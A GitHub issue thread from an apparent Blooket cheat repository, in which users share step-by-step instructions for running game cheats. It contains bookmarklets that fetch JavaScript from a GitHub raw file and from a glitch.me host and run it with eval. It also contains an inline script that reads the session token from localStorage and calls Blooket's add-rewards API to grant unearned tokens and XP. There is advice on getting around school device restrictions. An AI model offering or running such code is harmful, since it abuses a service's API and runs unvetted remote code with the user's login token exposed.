### ISSUE TITLE
OH MY GOD GUYS READ THIS BEFORE POSTING ANOTHER ISSUE!!!!!!!!!!!!

### ISSUE THREAD

**Issue by username122323** [glixzzy/blooket-hack#158]
I've read basically all of the issues. The cheats still exist. I hope all issues following this post will be about other stuff.

1. make a new bookmarklet with exact code:
javascript:fetch("https://raw.githubusercontent.com/glixzzy/blooket-hack/main/main.js").then((res) => res.text().then((t) => eval(t)))
2. then click bookmark while on blooket
3. it will take you to website
4. click global, then choose add tokens or spam boxes, whichever you use (these are the most popular)
5. then follow instructions, and it will do the command on the blooket page by itself (you NEED to keep blooket open I think)

If you are complaining about the website being blocked, you just log on to another google account on a personal device  because school accounts never allowed bookmarklets and inspect element anyways (for me). This could be your own computer or phone. It is literally not that hard, it is better than getting nothing at all. 

If you are looking for 500 token hack VIA bookmarklet, I found someone who made their own copy. (It works when I tested just do the bookmarklet thing and run bookmark)

javascript:fetch("https://autoclicker75.glitch.me/hackerman/tokens.js").then((res) => res.text().then((t) => eval(t)))
(thanks, hackerman or whatever your name was XD)

Anyways this is basically 90% of the issues, I hope that you guys will stop spamming it because it hurts my brain how many times a solution has come up and the same issue gets submitted again. 🙄 If you have any questions regarding this post please reply and I will try to respond. Again, stop spamming and screaming, please.

EDIT: Thanks Blooket Pro Player for this one. Paste this code into bookmark: (use this one if hackerman's link does not work)

javascript:async function getName(authToken) { const response = await fetch('https://api.blooket.com/api/users/verify-token?token=JWT+%27 + authToken); const data = await response.json(); return data.name};async function addTokens() { const add_tokens = prompt(%27How many tokens do you want to add to your account? (500 daily)%27); const myToken = localStorage.token.split(%27JWT %27)[1]; if (add_tokens > 500) { alert(%27You can add up to 500 tokens daily%27) } const response = await fetch(%27https://api.blooket.com/api/users/add-rewards%27, { method: "PUT", headers: { "referer": "https://www.blooket.com/", "content-type": "application/json", "authorization": localStorage.token }, body: JSON.stringify({ name: await getName(myToken), addedTokens: add_tokens, addedXp: 300 }) }); if (response.status == 200) { alert(${add_tokens} added to your account!); } else { alert(%27An error occured.%27); };};addTokens();

**Comment by Piplup7575** [comment]
@username122323 @glixzzy doesn't want that one floating around anymore after asking me to take it down (i made that copy) so maybe edit it?
But if you can't use school cheats than just use an autoclicker. [https://autoclicker75.glitch.me](https://autoclicker75.glitch.me)
if you could use bookmarklets, than that will work.
PLEASE STOP OPENING ISSUES  GLIXZZY KNOWS THAT THE SITE IS BROKEN
